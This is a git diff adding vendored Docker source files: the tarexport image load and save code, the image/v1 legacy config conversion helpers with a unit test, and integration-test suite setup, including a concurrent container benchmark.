+func (l *tarexporter) loadLayer(filename string, rootFS image.RootFS, id string, foreignSrc distribution.Descriptor, progressOutput progress.Output) (layer.Layer, error) {
+	// We use system.OpenSequential to use sequential file access on Windows, avoiding
+	// depleting the standby list. On Linux, this equates to a regular os.Open.
+	rawTar, err := system.OpenSequential(filename)
+	if err != nil {
+		logrus.Debugf("Error reading embedded tar: %v", err)
+		return nil, err
+	}
+	defer rawTar.Close()
+
+	var r io.Reader
+	if progressOutput != nil {
+		fileInfo, err := rawTar.Stat()
+		if err != nil {
+			logrus.Debugf("Error statting file: %v", err)
+			return nil, err
+		}
+
+		r = progress.NewProgressReader(rawTar, progressOutput, fileInfo.Size(), stringid.TruncateID(id), "Loading layer")
+	} else {
+		r = rawTar
+	}
+
+	inflatedLayerData, err := archive.DecompressStream(r)
+	if err != nil {
+		return nil, err
+	}
+	defer inflatedLayerData.Close()
+
+	if ds, ok := l.ls.(layer.DescribableStore); ok {
+		return ds.RegisterWithDescriptor(inflatedLayerData, rootFS.ChainID(), foreignSrc)
+	}
+	return l.ls.Register(inflatedLayerData, rootFS.ChainID())
+}
+
+func (l *tarexporter) setLoadedTag(ref reference.NamedTagged, imgID digest.Digest, outStream io.Writer) error {
+	if prevID, err := l.rs.Get(ref); err == nil && prevID != imgID {
+		fmt.Fprintf(outStream, "The image %s already exists, renaming the old one with ID %s to empty string\n", ref.String(), string(prevID)) // todo: this message is wrong in case of multiple tags
+	}
+
+	if err := l.rs.AddTag(ref, imgID, true); err != nil {
+		return err
+	}
+	return nil
+}
+
+func (l *tarexporter) legacyLoad(tmpDir string, outStream io.Writer, progressOutput progress.Output) error {
+	legacyLoadedMap := make(map[string]image.ID)
+
+	dirs, err := ioutil.ReadDir(tmpDir)
+	if err != nil {
+		return err
+	}
+
+	// every dir represents an image
+	for _, d := range dirs {
+		if d.IsDir() {
+			if err := l.legacyLoadImage(d.Name(), tmpDir, legacyLoadedMap, progressOutput); err != nil {
+				return err
+			}
+		}
+	}
+
+	// load tags from repositories file
+	repositoriesPath, err := safePath(tmpDir, legacyRepositoriesFileName)
+	if err != nil {
+		return err
+	}
+	repositoriesFile, err := os.Open(repositoriesPath)
+	if err != nil {
+		return err
+	}
+	defer repositoriesFile.Close()
+
+	repositories := make(map[string]map[string]string)
+	if err := json.NewDecoder(repositoriesFile).Decode(&repositories); err != nil {
+		return err
+	}
+
+	for name, tagMap := range repositories {
+		for tag, oldID := range tagMap {
+			imgID, ok := legacyLoadedMap[oldID]
+			if !ok {
+				return fmt.Errorf("invalid target ID: %v", oldID)
+			}
+			named, err := reference.WithName(name)
+			if err != nil {
+				return err
+			}
+			ref, err := reference.WithTag(named, tag)
+			if err != nil {
+				return err
+			}
+			l.setLoadedTag(ref, imgID.Digest(), outStream)
+		}
+	}
+
+	return nil
+}
+
+func (l *tarexporter) legacyLoadImage(oldID, sourceDir string, loadedMap map[string]image.ID, progressOutput progress.Output) error {
+	if _, loaded := loadedMap[oldID]; loaded {
+		return nil
+	}
+	configPath, err := safePath(sourceDir, filepath.Join(oldID, legacyConfigFileName))
+	if err != nil {
+		return err
+	}
+	imageJSON, err := ioutil.ReadFile(configPath)
+	if err != nil {
+		logrus.Debugf("Error reading json: %v", err)
+		return err
+	}
+
+	var img struct{ Parent string }
+	if err := json.Unmarshal(imageJSON, &img); err != nil {
+		return err
+	}
+
+	var parentID image.ID
+	if img.Parent != "" {
+		for {
+			var loaded bool
+			if parentID, loaded = loadedMap[img.Parent]; !loaded {
+				if err := l.legacyLoadImage(img.Parent, sourceDir, loadedMap, progressOutput); err != nil {
+					return err
+				}
+			} else {
+				break
+			}
+		}
+	}
+
+	// todo: try to connect with migrate code
+	rootFS := image.NewRootFS()
+	var history []image.History
+
+	if parentID != "" {
+		parentImg, err := l.is.Get(parentID)
+		if err != nil {
+			return err
+		}
+
+		rootFS = parentImg.RootFS
+		history = parentImg.History
+	}
+
+	layerPath, err := safePath(sourceDir, filepath.Join(oldID, legacyLayerFileName))
+	if err != nil {
+		return err
+	}
+	newLayer, err := l.loadLayer(layerPath, *rootFS, oldID, distribution.Descriptor{}, progressOutput)
+	if err != nil {
+		return err
+	}
+	rootFS.Append(newLayer.DiffID())
+
+	h, err := v1.HistoryFromConfig(imageJSON, false)
+	if err != nil {
+		return err
+	}
+	history = append(history, h)
+
+	config, err := v1.MakeConfigFromV1Config(imageJSON, rootFS, history)
+	if err != nil {
+		return err
+	}
+	imgID, err := l.is.Create(config)
+	if err != nil {
+		return err
+	}
+
+	metadata, err := l.ls.Release(newLayer)
+	layer.LogReleaseMetadata(metadata)
+	if err != nil {
+		return err
+	}
+
+	if parentID != "" {
+		if err := l.is.SetParent(imgID, parentID); err != nil {
+			return err
+		}
+	}
+
+	loadedMap[oldID] = imgID
+	return nil
+}
+
+func safePath(base, path string) (string, error) {
+	return symlink.FollowSymlinkInScope(filepath.Join(base, path), base)
+}
+
+type parentLink struct {
+	id, parentID image.ID
+}
+
+func validatedParentLinks(pl []parentLink) (ret []parentLink) {
+mainloop:
+	for i, p := range pl {
+		ret = append(ret, p)
+		for _, p2 := range pl {
+			if p2.id == p.parentID && p2.id != p.id {
+				continue mainloop
+			}
+		}
+		ret[i].parentID = ""
+	}
+	return
+}
+
+func checkValidParent(img, parent *image.Image) bool {
+	if len(img.History) == 0 && len(parent.History) == 0 {
+		return true // having history is not mandatory
+	}
+	if len(img.History)-len(parent.History) != 1 {
+		return false
+	}
+	for i, h := range parent.History {
+		if !reflect.DeepEqual(h, img.History[i]) {
+			return false
+		}
+	}
+	return true
+}
diff --git a/vendor/github.com/docker/docker/image/tarexport/save.go b/vendor/github.com/docker/docker/image/tarexport/save.go
new file mode 100644
index 0000000000..6e3a5bc589
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/tarexport/save.go
@@ -0,0 +1,355 @@
+package tarexport
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"time"
+
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/image/v1"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/reference"
+)
+
+type imageDescriptor struct {
+	refs   []reference.NamedTagged
+	layers []string
+}
+
+type saveSession struct {
+	*tarexporter
+	outDir      string
+	images      map[image.ID]*imageDescriptor
+	savedLayers map[string]struct{}
+	diffIDPaths map[layer.DiffID]string // cache every diffID blob to avoid duplicates
+}
+
+func (l *tarexporter) Save(names []string, outStream io.Writer) error {
+	images, err := l.parseNames(names)
+	if err != nil {
+		return err
+	}
+
+	return (&saveSession{tarexporter: l, images: images}).save(outStream)
+}
+
+func (l *tarexporter) parseNames(names []string) (map[image.ID]*imageDescriptor, error) {
+	imgDescr := make(map[image.ID]*imageDescriptor)
+
+	addAssoc := func(id image.ID, ref reference.Named) {
+		if _, ok := imgDescr[id]; !ok {
+			imgDescr[id] = &imageDescriptor{}
+		}
+
+		if ref != nil {
+			var tagged reference.NamedTagged
+			if _, ok := ref.(reference.Canonical); ok {
+				return
+			}
+			var ok bool
+			if tagged, ok = ref.(reference.NamedTagged); !ok {
+				var err error
+				if tagged, err = reference.WithTag(ref, reference.DefaultTag); err != nil {
+					return
+				}
+			}
+
+			for _, t := range imgDescr[id].refs {
+				if tagged.String() == t.String() {
+					return
+				}
+			}
+			imgDescr[id].refs = append(imgDescr[id].refs, tagged)
+		}
+	}
+
+	for _, name := range names {
+		id, ref, err := reference.ParseIDOrReference(name)
+		if err != nil {
+			return nil, err
+		}
+		if id != "" {
+			_, err := l.is.Get(image.IDFromDigest(id))
+			if err != nil {
+				return nil, err
+			}
+			addAssoc(image.IDFromDigest(id), nil)
+			continue
+		}
+		if ref.Name() == string(digest.Canonical) {
+			imgID, err := l.is.Search(name)
+			if err != nil {
+				return nil, err
+			}
+			addAssoc(imgID, nil)
+			continue
+		}
+		if reference.IsNameOnly(ref) {
+			assocs := l.rs.ReferencesByName(ref)
+			for _, assoc := range assocs {
+				addAssoc(image.IDFromDigest(assoc.ID), assoc.Ref)
+			}
+			if len(assocs) == 0 {
+				imgID, err := l.is.Search(name)
+				if err != nil {
+					return nil, err
+				}
+				addAssoc(imgID, nil)
+			}
+			continue
+		}
+		id, err = l.rs.Get(ref)
+		if err != nil {
+			return nil, err
+		}
+		addAssoc(image.IDFromDigest(id), ref)
+
+	}
+	return imgDescr, nil
+}
+
+func (s *saveSession) save(outStream io.Writer) error {
+	s.savedLayers = make(map[string]struct{})
+	s.diffIDPaths = make(map[layer.DiffID]string)
+
+	// get image json
+	tempDir, err := ioutil.TempDir("", "docker-export-")
+	if err != nil {
+		return err
+	}
+	defer os.RemoveAll(tempDir)
+
+	s.outDir = tempDir
+	reposLegacy := make(map[string]map[string]string)
+
+	var manifest []manifestItem
+	var parentLinks []parentLink
+
+	for id, imageDescr := range s.images {
+		foreignSrcs, err := s.saveImage(id)
+		if err != nil {
+			return err
+		}
+
+		var repoTags []string
+		var layers []string
+
+		for _, ref := range imageDescr.refs {
+			if _, ok := reposLegacy[ref.Name()]; !ok {
+				reposLegacy[ref.Name()] = make(map[string]string)
+			}
+			reposLegacy[ref.Name()][ref.Tag()] = imageDescr.layers[len(imageDescr.layers)-1]
+			repoTags = append(repoTags, ref.String())
+		}
+
+		for _, l := range imageDescr.layers {
+			layers = append(layers, filepath.Join(l, legacyLayerFileName))
+		}
+
+		manifest = append(manifest, manifestItem{
+			Config:       id.Digest().Hex() + ".json",
+			RepoTags:     repoTags,
+			Layers:       layers,
+			LayerSources: foreignSrcs,
+		})
+
+		parentID, _ := s.is.GetParent(id)
+		parentLinks = append(parentLinks, parentLink{id, parentID})
+		s.tarexporter.loggerImgEvent.LogImageEvent(id.String(), id.String(), "save")
+	}
+
+	for i, p := range validatedParentLinks(parentLinks) {
+		if p.parentID != "" {
+			manifest[i].Parent = p.parentID
+		}
+	}
+
+	if len(reposLegacy) > 0 {
+		reposFile := filepath.Join(tempDir, legacyRepositoriesFileName)
+		rf, err := os.OpenFile(reposFile, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0644)
+		if err != nil {
+			return err
+		}
+
+		if err := json.NewEncoder(rf).Encode(reposLegacy); err != nil {
+			rf.Close()
+			return err
+		}
+
+		rf.Close()
+
+		if err := system.Chtimes(reposFile, time.Unix(0, 0), time.Unix(0, 0)); err != nil {
+			return err
+		}
+	}
+
+	manifestFileName := filepath.Join(tempDir, manifestFileName)
+	f, err := os.OpenFile(manifestFileName, os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0644)
+	if err != nil {
+		return err
+	}
+
+	if err := json.NewEncoder(f).Encode(manifest); err != nil {
+		f.Close()
+		return err
+	}
+
+	f.Close()
+
+	if err := system.Chtimes(manifestFileName, time.Unix(0, 0), time.Unix(0, 0)); err != nil {
+		return err
+	}
+
+	fs, err := archive.Tar(tempDir, archive.Uncompressed)
+	if err != nil {
+		return err
+	}
+	defer fs.Close()
+
+	if _, err := io.Copy(outStream, fs); err != nil {
+		return err
+	}
+	return nil
+}
+
+func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Descriptor, error) {
+	img, err := s.is.Get(id)
+	if err != nil {
+		return nil, err
+	}
+
+	if len(img.RootFS.DiffIDs) == 0 {
+		return nil, fmt.Errorf("empty export - not implemented")
+	}
+
+	var parent digest.Digest
+	var layers []string
+	var foreignSrcs map[layer.DiffID]distribution.Descriptor
+	for i := range img.RootFS.DiffIDs {
+		v1Img := image.V1Image{
+			Created: img.Created,
+		}
+		if i == len(img.RootFS.DiffIDs)-1 {
+			v1Img = img.V1Image
+		}
+		rootFS := *img.RootFS
+		rootFS.DiffIDs = rootFS.DiffIDs[:i+1]
+		v1ID, err := v1.CreateID(v1Img, rootFS.ChainID(), parent)
+		if err != nil {
+			return nil, err
+		}
+
+		v1Img.ID = v1ID.Hex()
+		if parent != "" {
+			v1Img.Parent = parent.Hex()
+		}
+
+		src, err := s.saveLayer(rootFS.ChainID(), v1Img, img.Created)
+		if err != nil {
+			return nil, err
+		}
+		layers = append(layers, v1Img.ID)
+		parent = v1ID
+		if src.Digest != "" {
+			if foreignSrcs == nil {
+				foreignSrcs = make(map[layer.DiffID]distribution.Descriptor)
+			}
+			foreignSrcs[img.RootFS.DiffIDs[i]] = src
+		}
+	}
+
+	configFile := filepath.Join(s.outDir, id.Digest().Hex()+".json")
+	if err := ioutil.WriteFile(configFile, img.RawJSON(), 0644); err != nil {
+		return nil, err
+	}
+	if err := system.Chtimes(configFile, img.Created, img.Created); err != nil {
+		return nil, err
+	}
+
+	s.images[id].layers = layers
+	return foreignSrcs, nil
+}
+
+func (s *saveSession) saveLayer(id layer.ChainID, legacyImg image.V1Image, createdTime time.Time) (distribution.Descriptor, error) {
+	if _, exists := s.savedLayers[legacyImg.ID]; exists {
+		return distribution.Descriptor{}, nil
+	}
+
+	outDir := filepath.Join(s.outDir, legacyImg.ID)
+	if err := os.Mkdir(outDir, 0755); err != nil {
+		return distribution.Descriptor{}, err
+	}
+
+	// todo: why is this version file here?
+	if err := ioutil.WriteFile(filepath.Join(outDir, legacyVersionFileName), []byte("1.0"), 0644); err != nil {
+		return distribution.Descriptor{}, err
+	}
+
+	imageConfig, err := json.Marshal(legacyImg)
+	if err != nil {
+		return distribution.Descriptor{}, err
+	}
+
+	if err := ioutil.WriteFile(filepath.Join(outDir, legacyConfigFileName), imageConfig, 0644); err != nil {
+		return distribution.Descriptor{}, err
+	}
+
+	// serialize filesystem
+	layerPath := filepath.Join(outDir, legacyLayerFileName)
+	l, err := s.ls.Get(id)
+	if err != nil {
+		return distribution.Descriptor{}, err
+	}
+	defer layer.ReleaseAndLog(s.ls, l)
+
+	if oldPath, exists := s.diffIDPaths[l.DiffID()]; exists {
+		relPath, err := filepath.Rel(outDir, oldPath)
+		if err != nil {
+			return distribution.Descriptor{}, err
+		}
+		os.Symlink(relPath, layerPath)
+	} else {
+		// Use system.CreateSequential rather than os.Create. This ensures sequential
+		// file access on Windows to avoid eating into MM standby list.
+		// On Linux, this equates to a regular os.Create.
+		tarFile, err := system.CreateSequential(layerPath)
+		if err != nil {
+			return distribution.Descriptor{}, err
+		}
+		defer tarFile.Close()
+
+		arch, err := l.TarStream()
+		if err != nil {
+			return distribution.Descriptor{}, err
+		}
+		defer arch.Close()
+
+		if _, err := io.Copy(tarFile, arch); err != nil {
+			return distribution.Descriptor{}, err
+		}
+
+		for _, fname := range []string{"", legacyVersionFileName, legacyConfigFileName, legacyLayerFileName} {
+			// todo: maybe save layer created timestamp?
+			if err := system.Chtimes(filepath.Join(outDir, fname), createdTime, createdTime); err != nil {
+				return distribution.Descriptor{}, err
+			}
+		}
+
+		s.diffIDPaths[l.DiffID()] = layerPath
+	}
+	s.savedLayers[legacyImg.ID] = struct{}{}
+
+	var src distribution.Descriptor
+	if fs, ok := l.(distribution.Describable); ok {
+		src = fs.Descriptor()
+	}
+	return src, nil
+}
diff --git a/vendor/github.com/docker/docker/image/tarexport/tarexport.go b/vendor/github.com/docker/docker/image/tarexport/tarexport.go
new file mode 100644
index 0000000000..c0be95480e
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/tarexport/tarexport.go
@@ -0,0 +1,47 @@
+package tarexport
+
+import (
+	"github.com/docker/distribution"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/reference"
+)
+
+const (
+	manifestFileName           = "manifest.json"
+	legacyLayerFileName        = "layer.tar"
+	legacyConfigFileName       = "json"
+	legacyVersionFileName      = "VERSION"
+	legacyRepositoriesFileName = "repositories"
+)
+
+type manifestItem struct {
+	Config       string
+	RepoTags     []string
+	Layers       []string
+	Parent       image.ID                                 `json:",omitempty"`
+	LayerSources map[layer.DiffID]distribution.Descriptor `json:",omitempty"`
+}
+
+type tarexporter struct {
+	is             image.Store
+	ls             layer.Store
+	rs             reference.Store
+	loggerImgEvent LogImageEvent
+}
+
+// LogImageEvent defines interface for event generation related to image tar(load and save) operations
+type LogImageEvent interface {
+	//LogImageEvent generates an event related to an image operation
+	LogImageEvent(imageID, refName, action string)
+}
+
+// NewTarExporter returns new ImageExporter for tar packages
+func NewTarExporter(is image.Store, ls layer.Store, rs reference.Store, loggerImgEvent LogImageEvent) image.Exporter {
+	return &tarexporter{
+		is:             is,
+		ls:             ls,
+		rs:             rs,
+		loggerImgEvent: loggerImgEvent,
+	}
+}
diff --git a/vendor/github.com/docker/docker/image/v1/imagev1.go b/vendor/github.com/docker/docker/image/v1/imagev1.go
new file mode 100644
index 0000000000..d498ddbc00
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/v1/imagev1.go
@@ -0,0 +1,156 @@
+package v1
+
+import (
+	"encoding/json"
+	"fmt"
+	"reflect"
+	"regexp"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+)
+
+var validHex = regexp.MustCompile(`^([a-f0-9]{64})$`)
+
+// noFallbackMinVersion is the minimum version for which v1compatibility
+// information will not be marshaled through the Image struct to remove
+// blank fields.
+var noFallbackMinVersion = "1.8.3"
+
+// HistoryFromConfig creates a History struct from v1 configuration JSON
+func HistoryFromConfig(imageJSON []byte, emptyLayer bool) (image.History, error) {
+	h := image.History{}
+	var v1Image image.V1Image
+	if err := json.Unmarshal(imageJSON, &v1Image); err != nil {
+		return h, err
+	}
+
+	return image.History{
+		Author:     v1Image.Author,
+		Created:    v1Image.Created,
+		CreatedBy:  strings.Join(v1Image.ContainerConfig.Cmd, " "),
+		Comment:    v1Image.Comment,
+		EmptyLayer: emptyLayer,
+	}, nil
+}
+
+// CreateID creates an ID from v1 image, layerID and parent ID.
+// Used for backwards compatibility with old clients.
+func CreateID(v1Image image.V1Image, layerID layer.ChainID, parent digest.Digest) (digest.Digest, error) {
+	v1Image.ID = ""
+	v1JSON, err := json.Marshal(v1Image)
+	if err != nil {
+		return "", err
+	}
+
+	var config map[string]*json.RawMessage
+	if err := json.Unmarshal(v1JSON, &config); err != nil {
+		return "", err
+	}
+
+	// FIXME: note that this is slightly incompatible with RootFS logic
+	config["layer_id"] = rawJSON(layerID)
+	if parent != "" {
+		config["parent"] = rawJSON(parent)
+	}
+
+	configJSON, err := json.Marshal(config)
+	if err != nil {
+		return "", err
+	}
+	logrus.Debugf("CreateV1ID %s", configJSON)
+
+	return digest.FromBytes(configJSON), nil
+}
+
+// MakeConfigFromV1Config creates an image config from the legacy V1 config format.
+func MakeConfigFromV1Config(imageJSON []byte, rootfs *image.RootFS, history []image.History) ([]byte, error) {
+	var dver struct {
+		DockerVersion string `json:"docker_version"`
+	}
+
+	if err := json.Unmarshal(imageJSON, &dver); err != nil {
+		return nil, err
+	}
+
+	useFallback := versions.LessThan(dver.DockerVersion, noFallbackMinVersion)
+
+	if useFallback {
+		var v1Image image.V1Image
+		err := json.Unmarshal(imageJSON, &v1Image)
+		if err != nil {
+			return nil, err
+		}
+		imageJSON, err = json.Marshal(v1Image)
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	var c map[string]*json.RawMessage
+	if err := json.Unmarshal(imageJSON, &c); err != nil {
+		return nil, err
+	}
+
+	delete(c, "id")
+	delete(c, "parent")
+	delete(c, "Size") // Size is calculated from data on disk and is inconsistent
+	delete(c, "parent_id")
+	delete(c, "layer_id")
+	delete(c, "throwaway")
+
+	c["rootfs"] = rawJSON(rootfs)
+	c["history"] = rawJSON(history)
+
+	return json.Marshal(c)
+}
+
+// MakeV1ConfigFromConfig creates an legacy V1 image config from an Image struct
+func MakeV1ConfigFromConfig(img *image.Image, v1ID, parentV1ID string, throwaway bool) ([]byte, error) {
+	// Top-level v1compatibility string should be a modified version of the
+	// image config.
+	var configAsMap map[string]*json.RawMessage
+	if err := json.Unmarshal(img.RawJSON(), &configAsMap); err != nil {
+		return nil, err
+	}
+
+	// Delete fields that didn't exist in old manifest
+	imageType := reflect.TypeOf(img).Elem()
+	for i := 0; i < imageType.NumField(); i++ {
+		f := imageType.Field(i)
+		jsonName := strings.Split(f.Tag.Get("json"), ",")[0]
+		// Parent is handled specially below.
+		if jsonName != "" && jsonName != "parent" {
+			delete(configAsMap, jsonName)
+		}
+	}
+	configAsMap["id"] = rawJSON(v1ID)
+	if parentV1ID != "" {
+		configAsMap["parent"] = rawJSON(parentV1ID)
+	}
+	if throwaway {
+		configAsMap["throwaway"] = rawJSON(true)
+	}
+
+	return json.Marshal(configAsMap)
+}
+
+func rawJSON(value interface{}) *json.RawMessage {
+	jsonval, err := json.Marshal(value)
+	if err != nil {
+		return nil
+	}
+	return (*json.RawMessage)(&jsonval)
+}
+
+// ValidateID checks whether an ID string is a valid image ID.
+func ValidateID(id string) error {
+	if ok := validHex.MatchString(id); !ok {
+		return fmt.Errorf("image ID %q is invalid", id)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/image/v1/imagev1_test.go b/vendor/github.com/docker/docker/image/v1/imagev1_test.go
new file mode 100644
index 0000000000..936c55e4c5
--- /dev/null
+++ b/vendor/github.com/docker/docker/image/v1/imagev1_test.go
@@ -0,0 +1,55 @@
+package v1
+
+import (
+	"encoding/json"
+	"testing"
+
+	"github.com/docker/docker/image"
+)
+
+func TestMakeV1ConfigFromConfig(t *testing.T) {
+	img := &image.Image{
+		V1Image: image.V1Image{
+			ID:     "v2id",
+			Parent: "v2parent",
+			OS:     "os",
+		},
+		OSVersion: "osversion",
+		RootFS: &image.RootFS{
+			Type: "layers",
+		},
+	}
+	v2js, err := json.Marshal(img)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// Convert the image back in order to get RawJSON() support.
+	img, err = image.NewFromJSON(v2js)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	js, err := MakeV1ConfigFromConfig(img, "v1id", "v1parent", false)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	newimg := &image.Image{}
+	err = json.Unmarshal(js, newimg)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if newimg.V1Image.ID != "v1id" || newimg.Parent != "v1parent" {
+		t.Error("ids should have changed", newimg.V1Image.ID, newimg.V1Image.Parent)
+	}
+
+	if newimg.RootFS != nil {
+		t.Error("rootfs should have been removed")
+	}
+
+	if newimg.V1Image.OS != "os" {
+		t.Error("os should have been preserved")
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/benchmark_test.go b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go
new file mode 100644
index 0000000000..b87e131b7e
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go
@@ -0,0 +1,95 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"runtime"
+	"strings"
+	"sync"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) BenchmarkConcurrentContainerActions(c *check.C) {
+	maxConcurrency := runtime.GOMAXPROCS(0)
+	numIterations := c.N
+	outerGroup := &sync.WaitGroup{}
+	outerGroup.Add(maxConcurrency)
+	chErr := make(chan error, numIterations*2*maxConcurrency)
+
+	for i := 0; i < maxConcurrency; i++ {
+		go func() {
+			defer outerGroup.Done()
+			innerGroup := &sync.WaitGroup{}
+			innerGroup.Add(2)
+
+			go func() {
+				defer innerGroup.Done()
+				for i := 0; i < numIterations; i++ {
+					args := []string{"run", "-d", defaultSleepImage}
+					args = append(args, sleepCommandForDaemonPlatform()...)
+					out, _, err := dockerCmdWithError(args...)
+					if err != nil {
+						chErr <- fmt.Errorf(out)
+						return
+					}
+
+					id := strings.TrimSpace(out)
+					tmpDir, err := ioutil.TempDir("", "docker-concurrent-test-"+id)
+					if err != nil {
+						chErr <- err
+						return
+					}
+					defer os.RemoveAll(tmpDir)
+					out, _, err = dockerCmdWithError("cp", id+":/tmp", tmpDir)
+					if err != nil {
+						chErr <- fmt.Errorf(out)
+						return
+					}
+
+					out, _, err = dockerCmdWithError("kill", id)
+					if err != nil {
+						chErr <- fmt.Errorf(out)
+					}
+
+					out, _, err = dockerCmdWithError("start", id)
+					if err != nil {
+						chErr <- fmt.Errorf(out)
+					}
+
+					out, _, err = dockerCmdWithError("kill", id)
+					if err != nil {
+						chErr <- fmt.Errorf(out)
+					}
+
+					// don't do an rm -f here since it can potentially ignore errors from the graphdriver
+					out, _, err = dockerCmdWithError("rm", id)
+					if err != nil {
+						chErr <- fmt.Errorf(out)
+					}
+				}
+			}()
+
+			go func() {
+				defer innerGroup.Done()
+				for i := 0; i < numIterations; i++ {
+					out, _, err := dockerCmdWithError("ps")
+					if err != nil {
+						chErr <- fmt.Errorf(out)
+					}
+				}
+			}()
+
+			innerGroup.Wait()
+		}()
+	}
+
+	outerGroup.Wait()
+	close(chErr)
+
+	for err := range chErr {
+		c.Assert(err, checker.IsNil)
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/check_test.go b/vendor/github.com/docker/docker/integration-cli/check_test.go
new file mode 100644
index 0000000000..7084d6f8af
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/check_test.go
@@ -0,0 +1,383 @@
+package main
+
+import (
+	"fmt"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"sync"
+	"syscall"
+	"testing"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/pkg/reexec"
+	"github.com/go-check/check"
+)
+
+func Test(t *testing.T) {
+	reexec.Init() // This is required for external graphdriver tests
+
+	if !isLocalDaemon {
+		fmt.Println("INFO: Testing against a remote daemon")
+	} else {
+		fmt.Println("INFO: Testing against a local daemon")
+	}
+
+	if daemonPlatform == "linux" {
+		ensureFrozenImagesLinux(t)
+	}
+	check.TestingT(t)
+}
+
+func init() {
+	check.Suite(&DockerSuite{})
+}
+
+type DockerSuite struct {
+}
+
+func (s *DockerSuite) OnTimeout(c *check.C) {
+	if daemonPid > 0 && isLocalDaemon {
+		signalDaemonDump(daemonPid)
+	}
+}
+
+func (s *DockerSuite) TearDownTest(c *check.C) {
+	unpauseAllContainers()
+	deleteAllContainers()
+	deleteAllImages()
+	deleteAllVolumes()
+	deleteAllNetworks()
+	deleteAllPlugins()
+}
+
+func init() {
+	check.Suite(&DockerRegistrySuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerRegistrySuite struct {
+	ds  *DockerSuite
+	reg *testRegistryV2
+	d   *Daemon
+}
+
+func (s *DockerRegistrySuite) OnTimeout(c *check.C) {
+	s.d.DumpStackAndQuit()
+}
+
+func (s *DockerRegistrySuite) SetUpTest(c *check.C) {
+	testRequires(c, DaemonIsLinux, RegistryHosting)
+	s.reg = setupRegistry(c, false, "", "")
+	s.d = NewDaemon(c)
+}
+
+func (s *DockerRegistrySuite) TearDownTest(c *check.C) {
+	if s.reg != nil {
+		s.reg.Close()
+	}
+	if s.d != nil {
+		s.d.Stop()
+	}
+	s.ds.TearDownTest(c)
+}
+
+func init() {
+	check.Suite(&DockerSchema1RegistrySuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerSchema1RegistrySuite struct {
+	ds  *DockerSuite
+	reg *testRegistryV2
+	d   *Daemon
+}
+
+func (s *DockerSchema1RegistrySuite) OnTimeout(c *check.C) {
+	s.d.DumpStackAndQuit()
+}
+
+func (s *DockerSchema1RegistrySuite) SetUpTest(c *check.C) {
+	testRequires(c, DaemonIsLinux, RegistryHosting, NotArm64)
+	s.reg = setupRegistry(c, true, "", "")
+	s.d = NewDaemon(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TearDownTest(c *check.C) {
+	if s.reg != nil {
+		s.reg.Close()
+	}
+	if s.d != nil {
+		s.d.Stop()
+	}
+	s.ds.TearDownTest(c)
+}
+
+func init() {
+	check.Suite(&DockerRegistryAuthHtpasswdSuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerRegistryAuthHtpasswdSuite struct {
+	ds  *DockerSuite
+	reg *testRegistryV2
+	d   *Daemon
+}
+
+func (s *DockerRegistryAuthHtpasswdSuite) OnTimeout(c *check.C) {
+	s.d.DumpStackAndQuit()
+}
+
+func (s *DockerRegistryAuthHtpasswdSuite) SetUpTest(c *check.C) {
+	testRequires(c, DaemonIsLinux, RegistryHosting)
+	s.reg = setupRegistry(c, false, "htpasswd", "")
+	s.d = NewDaemon(c)
+}
+
+func (s *DockerRegistryAuthHtpasswdSuite) TearDownTest(c *check.C) {
+	if s.reg != nil {
+		out, err := s.d.Cmd("logout", privateRegistryURL)
+		c.Assert(err, check.IsNil, check.Commentf(out))
+		s.reg.Close()
+	}
+	if s.d != nil {
+		s.d.Stop()
+	}
+	s.ds.TearDownTest(c)
+}
+
+func init() {
+	check.Suite(&DockerRegistryAuthTokenSuite{
+		ds: &DockerSuite{},
+	})
+}
+
+type DockerRegistryAuthTokenSuite struct {
+	ds  *DockerSuite
+	reg *testRegistryV2
+	d   *Daemon
+}
+
+func (s *DockerRegistryAuthTokenSuite) OnTimeout(c *check.C) {
+	s.d.DumpStackAndQuit()
+}
+
+func (s *DockerRegistryAuthTokenSuite) SetUpTest(c *check.C) {
+	testRequires(c, DaemonIsLinux, RegistryHosting)
+	s.d = NewDaemon(c)
+}
+
+func (s *DockerRegistryAuthTokenSuite) TearDownTest(c *check.C) {
+	if s.reg != nil {
+		out, err := s.d.Cmd("logout", privateRegistryURL)
+		c.Assert(err, check.IsNil, check.Commentf(out))
+		s.reg.Close()
+	}
+	if s.d != nil {
+		s.d.Stop()
+	}
+	s.ds.TearDownTest(c)
+}
+
